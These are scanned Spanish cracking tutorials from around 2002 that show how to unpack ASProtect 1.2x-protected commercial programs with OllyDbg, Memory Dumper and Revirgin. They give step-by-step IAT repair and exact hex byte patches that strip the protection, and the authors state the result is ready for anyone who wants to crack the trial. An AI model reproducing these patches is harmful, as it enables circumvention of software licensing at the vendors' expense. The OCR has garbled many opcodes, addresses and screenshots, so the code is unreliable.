referencia a esta posición de memoria, veremos un ¡mp ds:[87A234] (esto en 
realidad se debería hacer para cada RVA aunque nos lleve a la misma entrada 
sólo por obtener el offset de donde es llamado), nos colocamos aquí y damos 


Enter, ya estaríamos en el offset donde se ejecuta la instrucción, ahí pulsamos 
Enter de nuevo y salimos al código ya de 1ESOCCC. 


También podemos saltarnos el encontrar el offset de la llamada y poner tan 
sólo en la ventana de código Crtl+G y esta dirección 1ES8OCCC, pero 
considero que lo anterior es útil. Practiquen , verán que simple es con Olly. 


01ESOCCC 55 

OIESOCCD 8BEC 
0O1ESOCCF 8B553 0C 
01E80CD2 8B43 08 
01ESOCD5 8B0D 1854E801 
OIESOCDB 8B09 
OIESOCDD 3BC8 
0O1ESOCDF 75 09 
01ESOCEl $B0495 4453E801 
DS:[EDX*441E85344] 
OIESOCES EB 07 
OIESOCEA 52 

O1ESOCEB 50 

0O1ESOCEC EsS 6F44FFFF 
01ES0CF1 5D 

01E80CF2 C2 0800 


PUSH EBP 

MOV EBP,ESP 

MOV EDX,DWORD PTR SS:[EBP+C] 
MOV EAX,DWORD PTR S5S:[EBP+8] 
MOV ECX,DWORD PTR DS:[1E85418] 
MOV ECX,DWORD PTR DS:[ECX] 
CMP ECX,EAX 

JNZ SHORT O! ESOCEA 

MOV EAX,DWORD PTR 


JMP SHORT 01E80CF1 
PUSH EDX 

PUSH EAX 

CALL 01E75160 

POP EBP 

RETN 8 


Son entradas buenas, dado que si nopeasemos esa call en el archivo original 
con Olly el programa fallaría, esto se hace colocándose encima de la 
instrucción en le80cec y pulsar la barra espaciadora, veremos el comando y lo 
sustituimos por nop asegurando la opción Fill with nop”s. 


Podemos saber que es si nos colocamos en la instrucción Call 01E75160 y 
damos a Enter o botón derecho del ratón y Follow. Iría a: 


01E75160 FF23 F871E801 


JMP DWORD PTR DS:[1E871P8] 


Una vez más pulsamos enter aquí y tenemos: 


8456C238 68 AS6DF7BF — PUSH KERNEL32.GetProcAddress 


Que se trata nada más y nada menos de GetProcAddress, para saber su 
dirección es muy simple, veis lo que he resaltado en rojo?, pues es la dirección 
de la API pero del revés, así que le damos la vuelta y tenemos BFF76DAS. 


Así que nos vamos a Revirgin y para estas entradas, ponemos en Edit Mode, 
encima de la 1 y 2: 


Module: Kernel32.dll 
Name: GetProcAddress 
Address: BFF76DAS 


Pulsamos el botón Resolve Again ya la 1 y la 2 fuera de combate: 
Entradas 3,4 y 5: 


Haríamos lo mismo de antes: 


e Crtl+G y luego le81110 
e O bién Crtl+G 87A238 y luego Crtl+R, Enter en el Jmp (apuntar FOCET 
para uso posterior) y Enter de nuevo. 


(Qué plomo soy xxD) 


Su código es el siguiente: 


01E81110 55 PUSH EBP 

01E81111 8BEC MOV EBP,ESP 

01E81113 8B45 08 MOV EAX,DWORD PTR S5S:[EBP+8] 
01E81116 85C0 TEST EAX,EAX 

01E81118 75 07 JNZ SHORT 01E81121 

01E8111A Al 7469E801 MOV EAX,DWORD PTR DS:[1E86974] 
01E8111F EB 06 JMP SHORT 01E81127 


01E81121 50 PUSH EAX 


01E81122 ES 3140FFFF CALL 01E75158 
01E81127 5D POP EBP 
01E81128 C2 0400 RETN 4 


Comprobamos que no es falsa porque si nopeamos esa llamada, el programa 
no funciona ni a la de 2000. 


Veamos que hay: 
Ya sabeis Enter o Follow sobre la instrucción, nos da: 


01E75158 FF25 FC71E801 JMP DWORD PTR DS:[1E871FC], otra vez 
más y)... 


8456C248 68 1677F7BF PUSH KERNEL32.GetModuleHandleA 


Bueno pues esta es la API para 3,4 y 5. Nos vamos de nuevo a Revirgin y 
ponemos para cada una de esas entradas: 


Module: Kernel32.dll 
Name: GetModuleHandleA 
Address: BFF77716 


Entrada 6 (Corramos un poco) 


Lo mismo de los mismo. 


01E81170 6A 00 PUSH 0 

01E81172 ES El 3FFFFF CALL 01E75158 

01E81177 FF35 FO6CE801 PUSH DWORD PTR DS:[1E86CFO0] 
01E8117D 58 POP EAX 

01E8117E C3 RETN 


Lo expliqué en el otro tute, pero es q es lo mismo, vereis: 
Asprotect nos hace pensar que está llamando a GetModulehandleA que sería 
la call, ni caso, poner un bpx aquí con F2 y verséis cómo en EAX al final del 


todo se devuelve el valor 8663276 (por ejemplo), que corresponde al resultado 
de GetCommandLineA. 


Comenté que en alguna parte de la ejecución de Asprotect antes de llegar al 
OFP, ejecuta GetCommandLineA y su resultado lo mete en un sitio, pues bien 
el sitio es 1E86CFO0, y no me hace falta comprobar lo que en su día comprobé, 
que efectivamente es así, ya que ese valor raro de 8663276 corresponde a 
GetCommandLine. 


También se puede parchear como propusieron Ricardo y Auspex con Mov,eax 
dir del OEP (dir real o sea 86B4FC) y RETN en el offset donde se realiza la 
llamada aquí pero para mi es más fácil GetCommandLineA. 


NOTA: 


Si alguien quiere comprobar que es GetCommandLineA, poner un bpx a 
Getversion por ejemplo, creo que si se pulsa FS al menos 2 veces y luego F12 
hasta llegar al código de Asprotect, veréis que trazando en algún momento 
realiza la llamada a GetCommandLineA y de forma peculiar en un MOV 
[ebx+0A],EAX, donde EAX es el resultado de GetCommanLineA, se 
almacena el valor, con ? ebx+0A, sabréis en que dirección lo guarda, 
casualmente sin duda es la de esa entrada. NO OS DEJEIS ENGAÑAR 5;) 


Para Revirgin: 


Module: Kernel32.dll 

Name: GetCommandLineA 

Address: BFFSC5DA ( la podeis hallar en SICE haciendo Crtl+D y u 
Kernel32!GetCommandLineA,) 


Entrada 7 (YA NO NOS ENGAÑARAN MAS): 


01E81180 55 PUSH EBP 

01E81181 8BEC MOV EBP,ESP 

01E81183 ES 983FFFFF CALL 01E75120 

01E81188 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 
01E8118B 5D POP EBP 

01E8118C C2 0400 RETN 4 


Si lo comprobais nos hace pensar que es GetCurrenProccess creo, pero EAX 
va tomando diversos valores, o sea que la API no vale para nada. 


ES FALSA, se debe buscar el offset de quién realiza la llamada y LUEGO en 
el archivo volcado reparar con un RETN 4. 


Tenemos para esta en: 


004084EC FF25 D4A38700  JMP DWORD PTR DS:[87A3D4] 
se debe cambiar a RETN 4en el archivo volcado, si quereeis comprobar que 
funciona también en el original. 


NOTA: En el archivo volcado no el original y sirve para todas las falsas, 
vamos a HexWorkShop y o bién como teníamos el offset de la llamada 
hacemos Crtl+G offset, en este caso 84EC y parcheamos FF25D4A38700 po 
C20400909090 (RETN 4, y recordar rellenar con NOP”s para ajustar el 
código), o bién Crtl+F para buscar el jmp, en este caso se debe buscar un 
FF25 D4A38700 y sustituirlo igualmente. 

SE DEBE HACER UNA VEZ RESUELTO CON REVIRGIN!!! Y 
ARREGLADA LA IAT 


Entrada $: 


Parecida a la 6 sólo que en este caso, es un GetVersion, comprobad, que EAX 
vale COOOOA04, que es el resultado de GetVersion en mi máquina. 


Así que en Revirgin esta entrada es: 


Module: Kernel32.dll 
Name: GetVersion 
Address: BFF92F1B 


Entradas 9 y 10: 

Entrada 9: 

1E81164 ES 0740FFFF CALL 01E75170 
01E81169 Al EC6CE801 MOV EAX,DWORD PTR DS:[1E86CEC] 
01E8116E C3 RETN 

Entrada 10: 

01E81190 55 PUSH EBP 
01E81191 8BEC MOV EBP, ESP 
01E81193 E8 D83FFFFF CALL 01E75170 
01E81198 5D POP EBP 
01E81199 C2 0400 RETN 4 


Comprobad si quereis, pero son falsas, se parchean en el archivo volcado 
como comenté en la 77: 


e La 9 con RETN, es decir cambiar FF2590A48700 por C39090909090 
que correcponde a RETN 

e La 10 con RETN 4, es decir cambiar FF259CA48700 por 
(20400909090 que corresponde a RETN 4 


Las entradas sin resolver deberían quedar así: 


y +Tsehp 


1.3 public version 


[Select Module to Antach >] 


A MESTIGA DO4ZAdSO 


mean imuvase 12) 
A sip | 
MAT Cotical Values E V 
pa ca E 0 par 
Length [Sonocsa aa Length f50000348 


ETA fpoooo00o Trace ferorimeas E] 


IU Autolix section: + IT paste 
T” MandedScheme high limit frooooo0o 

Abos | 
lariconta. os Resol imc 


x] veis que 
y Hee] quedan 


resueltas, 
esto lo he 
dejao así, 
pero a 
medida que 
vayais 
resolviendo 
se debe ir 
pulsando 
Resolve 
Again, y la 
API será ya 
fijada 
como 
resuelta. 


Y a tenemos resuelto con Revirgin. Así que damos al botón Generate 
seleccionamos el archivo volcado y listo (ojo! Os dirá que la tabla está 
incompleta no pasa nada), archivo original arreglado, salvo arreglar lo de las 3 
entrads falsas que hay que parchear con el Editor hexadecimal de la forma 


arriba indicada. 
POR FIN DOMESTICAMOS DE NUEVO A LA FIERA!. XD 
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Como descomprimir asprotect 1.23 con OLLYDBG 
Estudio Realizado por: Ricardo Narvaja - 25/09/2002 


RESPUESTA DEL CONCURSO 19 


Bueno vamos a explicar en esta respuesta como desempacar el AD SEARCH AND REPLACE 
1.9 build 90 se puede bajar de 

http://www .abroaddesign.com/download.html 

que esta comprimido con asprotect 1.23 usaremos OLLYDBG y como dumpeador el MEMORY 
DUMPER 1.0. 


El memory dumper se puede bajar de mi FTP o de 
http://212.14.34.87/-fk1epsk1/down/uzytk1/memdump.zip 


El crack esta en astalavista o pueden hacerlo ustedes mismo si quieren. 


El tema es porque no usamos para dumpear LORDPE o PROCDUMP, es que hemos detectado 
errores en el dumpeo con ambos programas y el Memory Dumper es estilo ICEDUMP o sea que 
vuelca la memoria de un proceso poniendo el valor inicial y el largo de la imagen sin repararla ni 
tocarla lo que hace mas posible que funcione a posteriori, el Procdump y LordPE la reparan ellos 
y allí a veces sale mal en este caso no funciona dumpeandolo con ninguno de esos programas ni 
tampoco con el PUPE solo con el Memory Dumper o con Icedump si usas SOFTICE. 


Bueno abrimos el programa con OLLYDBG y usaremos este método para llegar al entry point 
que funciona con Asprotect y OLLYDBG por supuesto. 


En el OLLDBG vamos a OPTIONS-DEBUGGING OPTIONS pestaña exceptions y ponemos allí 
las tildes de esta forma. 


Debugging options 


Y PP tirita 


| 5 | Disas cpu | Rec 


—Commands | Disassembler | 
- Security | Debug | Events 


Solo la primera tilde. 

Luego realizamos el siguiente método, arrancamos con RUN, parara el programa en una 
EXCEPCION que la pasamos CON SHIFT mas F7 y luego de nuevo RUN, y vamos anotando la 
posición de memoria que en el OLLY para cada vez que hace una excepción. 

Como vamos haciendo RUN es rápido parará alrededor de 20 veces y llegara un punto que 
arrancara el programa y ya no habrá mas excepciones, como anotamos todas las que paro 
marcamos la ultima antes de arrancar para llegar de nuevo hasta allí. 

Hacemos RESTART y arrancamos de nuevo y con el mismo método vamos con RUN y SHIFT 
mas F7 hasta llegar a la ultima excepción esa que habíamos anotado antes de arrancar el 
programa, y paramos allí, la arreglamos con SHIFT mas F7 y no hacemos RUN pues si no ya 
arrancaría el programa. 

Entonces vamos a VIEW-MEMORY y marcamos la primera sección donde debe estar el ENTRY 
POINT hacemos CLICK DERECHO y luego BREAKPOINT MEMORY ON ACCESS, ahí 
recién hacemos RUN y parara en el ENTRY POINT que en este caso es 47cf94, y coincide con el 
que nos marca el PEID 8, pero siempre es bueno corroborar además que otra forma de que pare 
allí no hay con OLLY si pones BPM al inicio del programa se cuelga. 

Pero es un método rápido y cuando uno lo hace un par de veces en 1 o 2 minutos llega al ENTRY 
POINT fácilmente. 

Bueno llegamos, no es necesario hacer un LOOP INFINITO con MEMOR Y DUMPER así que 
primero nos fijamos en el PEEDITOR cual es la image base y cual es el tamaño de la imagen en 
este caso son: 


 [PEditor 1.7] byyoda € M.o.D. 


scouting... C:Lárchivos de programa 4D SearchtReplaceSearchl.exe - 28672 | 


poooroDo | 


DOB 


00400000 
l ! | 
foarenoo E 
0082000 _[Hl CI 
TN Perez 


O Í 
24425813 | 
0 ] 
10 | 


0000400 
0001000 4 


a 
fono E 


ImageBase: 400000 y size of image o tamaño de la imagen: B2000 


Abrimos el Memory dumper seleccionamos el proceso SEARCH.exe y colocamos los datos con 
el prefijo Ox ya que en este programa si son valores hexa hay que colocarles antes Ox. 


Ss Memory Dumper V1.0 


CMARCHIVOS DE rr A EXE F 
CABRCHIVMOS DE PROGRAMANAD £ SEARCH2.ExXE 

Se ARCHIVOS DE PROGAAMANGS FTP SEAVERNGEFTPSAV EXE 
CAARCHIVOS DE PROGRAMAAGREATISAREGRUNSUITENWATCHDOG.E' 
CAARCHIWOS DE PROGRAMANGRISOFTAAVGE-MAVGEC32.EXE 
CAARCHIVOS DE PROGRAMANGRISOFTMAWG6LAVGSERV9.EXE 
CAARCHIWOS DE PROGRAMAMNTERNET EXPLORERNEXPLORE.ExE 
CAARCHIVOS DE PROGRAMAAMEMORY DUMPERAMEMORYDUMPER.E:: 
CAARCHIWOS DE PROGRAMANMEMDRY OPTIMIZERAMEMORYOPTIMIZE 
CAARCHIWOS DE PROGRAMAAMESSENGERAMSMSGS.EXE : 
CAARCHIWOS DE PROGRAMANNO-PADUC20.EXE 550) 
CMARCHIVOS DE PROGRAMAANTSAENTERNET SOMAPPAENTERNET. Es, 


Download Process Memory To File > 


¡c: SWINDOWSKE seritorio.DUMPEADO. exe a | 


0x400000 ] 


lose 2000 


Elegimos donde guardarlo y el nombre que tendrá el archivo y clickeamos en DUMP MEMORY 
y listo, archivo guardado. 


Vemos que el archivo es igual que los del ICEDUMP no tiene icono, así que en el PEEDITOR lo 
abrimos y vamos a SECTIONS, luego CLICK DERECHO DUMPFIXER y listo ya estará 
arreglado y saldrá el icono nos queda solo arreglar el ENTRY POINT cambiamos el original 
1000 por el que hallamos 7cf94 y guardamos los cambios y ya tenemos el archivo dumpeado para 
reparar con REVIRGIN. 


Bueno ponemos a funcionar el programa original y cuando ya arranco lo minimizamos y abrimos 
REVIRGIN. 


Buscamos el proceso SEARCH.exe y luego colocamos el valor del ENTRY POINT que aquí va 
completo 

OEP = 47cf94 y apretamos FETCH IAT a mi me salen los valores correctos de INICIO DE 
TABLA y LARGO o sea: 


RWVA= 00081140 
LENGHT= 000006DO0 


Si a alguien le da un valor erróneo se puede verificar fácilmente mirando el programa original 


con OLLY y pausándolo una vez que arranco en la ventana inferior del DUMP ponemos GOTO 
EXPRESSION = 481140 

y veremos que allí comienza la tabla antes hay ceros, y si seguimos bajando veremos que termina 
en 481810 si restamos ambos valores da 6d0, también se pueden mirar los saltos buscando FF 25 
en el ULTRA EDIT lo único que aquí los saltos no están ordenados y están dispersos lo que 
complica un poco la tarea. 


Bueno le damos a IAT RESOLVER y luego cuando para a RESOLVE AGAIN, y vemos que hay 
10 entradas sin resolver anotamos los valores que nos da de cada una en la columna IATRVA 
ellos son 


| L Revirgin by +Tsehp 1.3 public version 
search2.exe FFF4DFC? 0O00B 2000 00400000 


A O E E 
A ES 


o | fonao1ooo| 
7 A 
Ls [00000600 


Allí se ven los no resueltos son 10 y debemos tracear en el OLLY cada uno a ver que debemos 
colocar en cada entrada así que guardamos con SAVE RESOLVED para que guarde lo hecho 
hasta aquí y vamos al OLLY en el cual abrimos el Original SEARCH.exe y llegamos hasta el 
entry point con el método que mostramos anteriormente. 


Una vez que llegamos al ENTRY POINT buscamos en la ventana inferior del DUMP con CLICK 
DERECHO y GOTO EXPRESSION 481198 la primera entrada sin resolver. 


¡Enter expression to follow in Dump 


OllyDbg - Searchl.exe - [CPU - main thread, module SEARCHI1I|] 


ñ1 A4F14700 


3606 
ES SOBS8FOFF CALL CARCHI. 004 408009 
Al A4F14700 MOV ERX, DWORD PTR 0S:(47F1A4] 


$600 
SA F4CF4708 , ASCII "AD SearchtR 
ES 4364FDFF SEARCHI . 00440404 ES 0187 


Al A4F14700 ES 017F 
2690 s5 6187 
DS 9187 
FS 7E0F 
65 0908 


LastErr 


ASCII “Searoh.hlp 


ODANÑDD 
0000000 


Al _R4F14760 


SeJo 
ES BIGSFDFF 0 
CALL SEARCH! . 0040394C 
Unknown cormand 


EEES Unknown cormand 
DIJORD PTR 05: CEAXI, EAX 

ROD BYTE PTR 0S: LERX1, AL 

INC ECX 

INC ESP 
BYTE PTR 0S: [EBX+653, DL 


POPAD 

JB SHORT SEARCHI.0047D05F 
PUSH 76655226 

INS EvTÉ PTR ES: [EDI 7, 0X 


E TE 
, OB6EFE44| S1812208 

A OOSEFE4S| 0OSEUaÓO 
DL DOSEFEAC| 72616553 


Allí vemos parado el programa en el ENTRY POINT y en la ventana del dump ya muestra 
481198 y ya esta grisado el contenido esos cuatro valores que están en HEX DUMP luego 
hacemos CLIK DERECHO BREKPOINT MEMORY ON ACCESS y RUN. 


parara aquí: 


004012DC -FF23 98114800 JMP DWORD PTR DS:[481198] 


en el salto que utiliza esta entrada, en un programa descomprimido aquí iría directo a una API 
pero aquí va a una rutina de asprotect que es lo que hay que analizar en todas las entradas (las 
direcciones pueden variar según la maquina: 


0114E494 55 PUSH EBP 

0114E495 SBEC MOV EBP,ESP 

0114E497 8B53 0C MOV EDX,DWORD PTR SS:[EBP+C] 
0114E49A 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 
0114E49D 8B0D B8541501 MOV ECX,DWORD PTR DS:[11554B8] 
0114E4A3 8B09 MOV ECX,DWORD PTR DS:[ECX] 
0114E4A5 3BC8 CMP ECX,EAX 

0114E4A7 7509 JNZ SHORT 0114E4B2 

0114E4A9 8B0495 14531501 MOV EAX,DWORD PTR DS:[EDX*4+1155314] 
0114E4B0 EB 07 JMP SHORT 0114F4B9 

0114E4B2 52 PUSH EDX 

0114E4B3 50 PUSH EAX 

0114E4B4 E8 FF6BFFFF CALL 011450B8 

0114E4B9 5D POP EBP 

0114E4BA C2 0800 RETN 8 


Bueno esta rutina solo se encuentra en el programa comprimido y debemos analizar que es lo que 
hace falta aquí y que no para que el programa funcione por lo pronto vamos a tracearla hasta 
llegar a la CALL que va a la api una vez allí hacemos F7 y vemos lo siguiente: 


011450B8 -FF25 EC711501 JMP DWORD PTR DS:[11571EC] 


Estando aquí ya en este salto vemos que nos aclara el OLLY Thunk to GetProcAddress por lo 
tanto sabemos que va a esta API, y si queremos podemos mirar el contenido de 11571ec en el 
dump para ver si realmente va alli: 


011571EC 48 3E 5C 87 Hz 
o sea que saltara a 875c3e48 lo mostraba en la aclaración también vamos a ver allí que hay; 


875C3E48 68 AS6DF7BF PUSH KERNEL32.GetProcAddress 
875C3E4D -E978199D38  JMP KERNEL32.BFF957CA 


O sea pone en el STACK el valor que va a la api GetProcAddress y luego salta al KERNEL32 
siempre al mismo valor en todas las entradas que es una especie de RET así que en resumidas 
cuentas vaa GETPROCADDDRESS. 


Ahora ya tenemos el nombre debemos ver la posición de memoria en KERNEL32 de 
GETProcAddress para ver que colocamos en REVIRGIN, para eso vamos en el OLLY a VIEW- 
EXECUTABLE MODULES marcamos KERNEL32.dll hacemos click derecho y VIEW NAMES 
allí podemos colocarlos por orden alfabético con click derecho SORT BY NAME y vemos que 


GETPROCADDRESS en mi maquina esta en 


Names in KERNEL32, item 322 
Address=BFF76DAS 
Section=_FREQASM 
Type=Export (Known) 
Name=GetProcAddress 


ya tenemos los valores para completar en el revirgin ahora lo único que nos faltaría es determinar 
si es una entrada verdadera o falsa si fuera verdadera llenamos el REVIRGIN con estos valores si 
no NO. 

Como determinamos eso: 

En el OLLY cuando llegamos a la rutina de asprotect que vimos antes nopeamos el CALL a la 
API para ver si es necesaria o no, quedaría así nopeada: 


0114E494 55 PUSH EBP 

0114E495 SBEC MOV EBP,ESP 

0114E497 8B553 0C MOV EDX,DWORD PTR SS:[EBP+C] 
0114E49A 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 
0114E49D 8B0D B8541501 MOV ECX,DWORD PTR DS:[11554B8] 


0114E4A3 8B09 MOV ECX,DWORD PTR DS:[ECX] 
0114E4A5 3BC8 CMP ECX,EAX 

0114E4A7 7509 JNZ SHORT 0114E4B2 

0114E4A9 8B0495 14531501 MOV EAX,DWORD PTR DS:[EDX*4+1155314] 
0114E4B0 EB 07 JMP SHORT 0114F4B9 

0114E4B2 52 PUSH EDX 

0114E4B3 50 PUSH EAX 

0114E4B4 90 NOP 

0114E4B5 90 NOP 

0114E4B6 90 NOP 

0114E4B7 90 NOP 

0114E4B8 90 NOP 

0114E4B9 5D POP EBP 


0114E4BA C2 0800 RETN 8 
Bueno ahora debemos quitar el BPM y dar RUN para ver si el programa arranca y funciona 
normal, si arranca sin la api la entrada es falsa y la dejamos vacía en el REVIRGIN, y si no 


arranca es que la api es necesaria para que funcione y es verdadera con lo que ya tenemos el 
resultado para anotar en el REVIRGIN. 


En este caso no arranca el programa al nopear la api por lo que la entrada es verdadera o sea 


81198 colocamos GETPROCADDRESS en la columna name y BFF76DAS en la columna 
address le damos a resolve again y se solucionara verificamos y seguimos con la siguiente. 


Bueno realizando el mismo método de verificar cada entrada y nopear el call a la api para ver si 
son verdaderas o falsas hallamos los siguientes resultados: 


Verdaderas son solo estas cuatro entradas 


481198 Getprocaddress 
48119c GetModuleHandlea 
48131c GetProcAddress 
481320 Getmodulehandlea 


En todas estas la api es necesaria. 


la restantes si nopeamos la api el programa arranca igual no asi con la parte restante de la rutina, 
alli hay que probar que partes de cada rutina son importantes también nopeando y se llega al fin a 
la siguiente conclusión: 


481360 falsa reemplazar por RETN4 

481300 falsa reemplazar por RETN 

481354 falsa reemplazar por RETN 

4812bc falsa reemplazar por RETN4 

4811lac falsa reemplazar por mov eax,47cf94 y RETN 
481248 falsa reemplazar por mov eax,400000 y retn4 


O sea de 481360 y 481354 si nopeamos toda la rutina y dejamos solo el RETN 4 arranca el 
programa y funciona normalmente. 

Lo mismo 481300 y 481354 solo es necesario el RETN. 

En 4811lac mueve a EAX un valor y luego hace RETN ese valor si colocamos el mismo solo 
funcionara en nuestra maquina si lo reemplazamos por el entry point funcionara en cualquier 
maquina, ver tute de Auspex o el mío de Icon Catcher de asprotect 1.22 que es semejante. 

en 481248 solo importa que MOV eax,400000 y RETN4 con eso arranca el programa sin eso no. 


Bueno ahora solo queda Resolver la tabla con revirgin completando los valores verdaderos y los 
falsos dejarlos vacíos, ir a GENERATE y cuando nos pide el DUMP cargar el archivo dumpeado 


que habíamos guardado, con eso las verdaderas estarán listas. 


Las falsas debemos realizar el mismo proceso que hicimos para llegar a la rutina a investigar pero 
al llegar al salto JMP que nos lleva a la rutina parar allí. 


Para la entrada falsa 481360 si pusimos un BPM parara en el JMP 

004068F8 -FF25 60134800  JMP DWORD PTR DS:[481360] 

Tenemos lugar aquí suficiente para editar este JMP con ASSEMBLE y reemplazarlo por el 
RETN 4, luego realizamos dichos cambios en un editor hexadecimal. 

Con cada entrada falsa reemplazamos su JMP por las sentencias que hallamos que son necesarias 


y hacemos esos cambios en el ULTRAEDIT. 


para 481300 parara en el JMP en: 


004069C0 -FF25 00134800  JMP DWORD PTR DS:[481300] 
lo reemplazamos por un RETN y realizamos los cambios en un editor hexa. 
para 481354 parara en el JMP en: 

00406910 -FF25 54134800  JMP DWORD PTR DS:[481354] 
lo reemplazamos por RETN 

para 4812bc parara en; 

00406A48 -FF25 BC124800 JMP DWORD PTR DS:[4812BC] 
reemplazar por RETN 4 

para 481lac parara en 

004012B4 -FF25 AC114800  JMP DWORD PTR DS:[4811AC] 
y reemplazamos por 


MOV eax,47cf94 
RETN 


para 481248 parara en 
004066BC -FF25 48124800  JMP DWORD PTR DS:[481248] 
reemplazar por 


MOV eax,400000 
RETN 4 


y listo 


Igual al ejecutar el dumpeado si esta todo hecho correcto hay algunos detalles 
que reparar da un error, si vemos el TRACE INTO vemos que hay un CALL que 
todavía llama a una rutina de asprotect que es una especie de protección 
antidumpeado siguiendo a que parte del programa va cuando retorna y 
modificando ese CALL ya arrancara el programa es en 47cfd5 para que apunte a 
la dirección donde dice 115666bc q es 47cbdc, es decir se debe sustituir FF 15 34 


0A 48 00 por ES 02 FC FF FF 90. 
y quedara reemplazado el CALL 


0047CFD5 FF15 34044800 CALL DWORD PTR DS:[480A34] 
reemplazando los valores quedara asi 
0047CFD5 .ES02FCFFFF CALL 0047CBDC 


Lo ultimo es el error que aparece al apretar el botón REGISTER PRODUCT, en el original allí 
aparece la ventana para ingresar la clave para registrarse con este parche quedara igual. 


El parche es asi: 

4709eb CALL 4091b4 

Hay que nopear este CALL 

En el ultra edit buscar 

ES c4 87 f9 ff 83 7d f9 00 

y reemplazar los cinco primeros bytes por NOP quedaría 

90 90 90 90 90 83 7d f9 00 

Con eso ya esta el trial perfectamente funcionando sin asprotect para el que lo quiere crackear y 
se puede ingresar la clave. 

Y funcionara les dejo para ustedes el crackeo del mismo lo importante es que ya esta dumpeado y 
que funciona y esta sin asprotect 1.23. 

Ricardo Narvaja 
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Programacion. Email "Colabora con tus 
Proyectos" 


Karpoff Spanish Tutor 1999-2002 


RAM ldle Profesional [ Desempakar Asprotect 1.2x con 
OllyDbg ] 


Estudio Realizado por: DGrojo  - 25/09/2002 


RAM Idle Profesional (By DGrojo 21/9/2002) 


Antes que nada podeis leeros el tutorial de obligada referencia de Auspex en 
la compilación de tutoriales de profesorX (la v7.5) sobre el Icon Catcher y el 
tutorial de Ricardo Narvaja sobre Search € Replace. Los dos magníficos 
como siempre. 


VAYAMOS A POR EL INNOMBRABLE 
En fin al asunto: 


Lo primero como siempre, analizar la víctima. Abrimos el Peid y cargamos el 
programa: 


Open Ple CAWINDOWSEscotonolproyecto asprotec Manager 00 
EP Section : 


Frát bytes : 068h,001h,090h,050) 
Sib yatem: Wn32 GUI (0002) 


ASProtect 1.2: [New Sram) -> Aleve Solodombrr 


FT Zay- Or Top 


——————— >. Qui 


Después de analizar con PEID, nos damos cuenta que se trata del nuevo 


Asprotect 1.2x versión New Strain, vamos al OEP module y nos saca como 
Entry Point 4D14AC. 


GenDEP 


1) DEP Found - 4D14AC 


Para cerciorarnos, ya que puede haber veces que no da el OEP correcto, 
usamos el método descubierto por Ricardo Narvaja para encontrar el OEP en 
Olly y que aún no he visto que falle xD con ningún Asprotect (en principio 
válido para esta versión de Asprotect). 


Este método consiste en introducir el programa el el Olly y ejecutarlo con F9 
donde se irán generando unas excepciones en el transcurso del programa (por 
lo menos 20 o así), que iremos superando con Shift+F7 y F9 de nuevo, y que 
llegados a la última al pulsar F9 se ejecutará el programa, así que anotamos 
esa dirección en la que para por última vez, en mi caso 1272CES5. 
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De todas formas antes conviene tener anotados el tamaño de la imagen y el 
largo (como datos para el volcado de memoria al disco), además de conocer 
cual es la sección de código donde cae el OEP, aunque para poner el Break 
Point On Memory Access en su sección con Olly claramente aparece en en la 
parte Contains la etiqueta Code de la ventana Memory Map, que hacemos 
aparecer con Alt+M. 

Así que abrimos el Peditor y vemos estos datos, también pulsaremos el botón 
Sections: 


La imagen está en 400000 y el tamaño es de 1DE000 


Se vuelve a reiniciar el programa en Olly, y hacemos esto hasta la dirección 
última donde se producía la excepción 1272CE5, momento en el cual 
ponemos un Break Point On Memory Access, en la sección de ejecución del 
programa, damos Shift+F7 y F9 y Eureka!, estamos en el OEP, que vemos 
coincide con el que mostró PEID. 
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Bueno vamos a ello!, ahora que estamos en el OEP toca descomprimir (ya 
viene lo bueno xD). Dado que Olly no dispone de descompresor, necesitamos 
una alternativa que vuelque de la memoria este proceso, justo aquí en el OEP. 


PROBLEMAS DEL VOLCADO (VOLCAR LO REVOLCADO) 

Haré un pequeño inciso acerca del volcado. En principio disponemos de 
muchas herramientas que vuelquen un proceso de memoria al disco, como 
LordPE, ProcDump, Pupe, Ice Dump y ahora Memory Dumper, por ejemplo. 


Se han detectado problemas a la hora de descomprimir con LordPE, 
ProcDump, y otros ya que descomprimen cuando el proceso está totalmente 
cargado en memoria, es decir ya está ejecutado. 


El problema es que el programa viene con unas secciones completamente 
vacías que va rellenando en ejecución, y al volcar con estos programas estos 
datos están cargados ya en dichas secciones. 


Hasta aquí no habría problema si sólo sobrescribiese esas secciones, pero no 
es así, antes de hacer cualquier cosa hace como una especie de comparación 
para saber si está sin tocar, y luego continua haciendo unas operaciones, que 
en algunos casos crea nuevas secciones en ejecución donde introduce datos 
para ejecutar correctamente el programa. 

El problema es que los volcados con los datos ya almacenados aquí, se 
ejecutan de otro modo, y el trazado es materialmente imposible, y por 
supuesto su ejecución es errónea. 


Las alternativas de volcado, se reducen a hacerlo justo justo en el OEP, ya sea 
mediante el Ice Dump (pero para ello necesitamos SICE cargado y conseguir 
pararlo en el OEP), y ahora además el Memory Dumper, que se lleva muy 
bién con Olly y nos permite volcar el proceso en el OEP justo, dado que ya 
llegamos a el con Olly, JUSTO EN ESE MOMENTO!!!. 


Así que nada nada, abramos el Memory Dumper y busquemos por el proceso. 
Necesitamos indicarle donde queremos guardar el volcado, el tamaño de la 
imagen y el comienzo (datos que ya teníamos anotados) y lo hacemos así: 


Target Process 


CURCHIVOS DE PROGRAMAWIUTLOOK EXPRESS WASIMN EXE 
CAWARCHIVOS DE PROGRAMAVWINAMPXWINAMP EXE 
CARCHIVOS DE PROGRAMANZONE LABS ZONEALARMIZONEALARM | 
CADULYDBGMOLLYDEG DE 

CPEID'PEID DE 

CASCANJE TPROWPRECISIONSCANPRO HPLAMP EXE 


CWAIHDOWS WPLORER DE 
CEWAINDOWSWLOADOM EXE 
CWINDOWS RurDLL ex 
CAWINDOWS RUNDLLAO EXE 
COMAINDOWSASYS TEMDDHELP EXE 


” 
. 
Retresh Process Lit [Download Proces: Memory To File +] 
Butte: Detad: 


Fóe Name fc WANDOWSWE scrtono proyecto arproteci'unemdurmpman ex S 
Start Location 10400000 - 
Byte Count [0:10£ 000 —Pegater | 


[_bumoMency ] tw | __ ts | 


Se pone el 0x porque lo ponemos en hexadecimal. Pulsamos el botón Dump 
Memory y viola ya tenemos el archivo volcado al disco. 

(Tardará un poco y parece como que se bloquea al menos a mi, nos os 
preocupeis ;-)) 


Bién, como siempre que volcamos de la memoria necesitamos hacer que el 
tamaño en disco sea igual al tamaño virtual, porque lo hemos volcado de la 
memoria. 


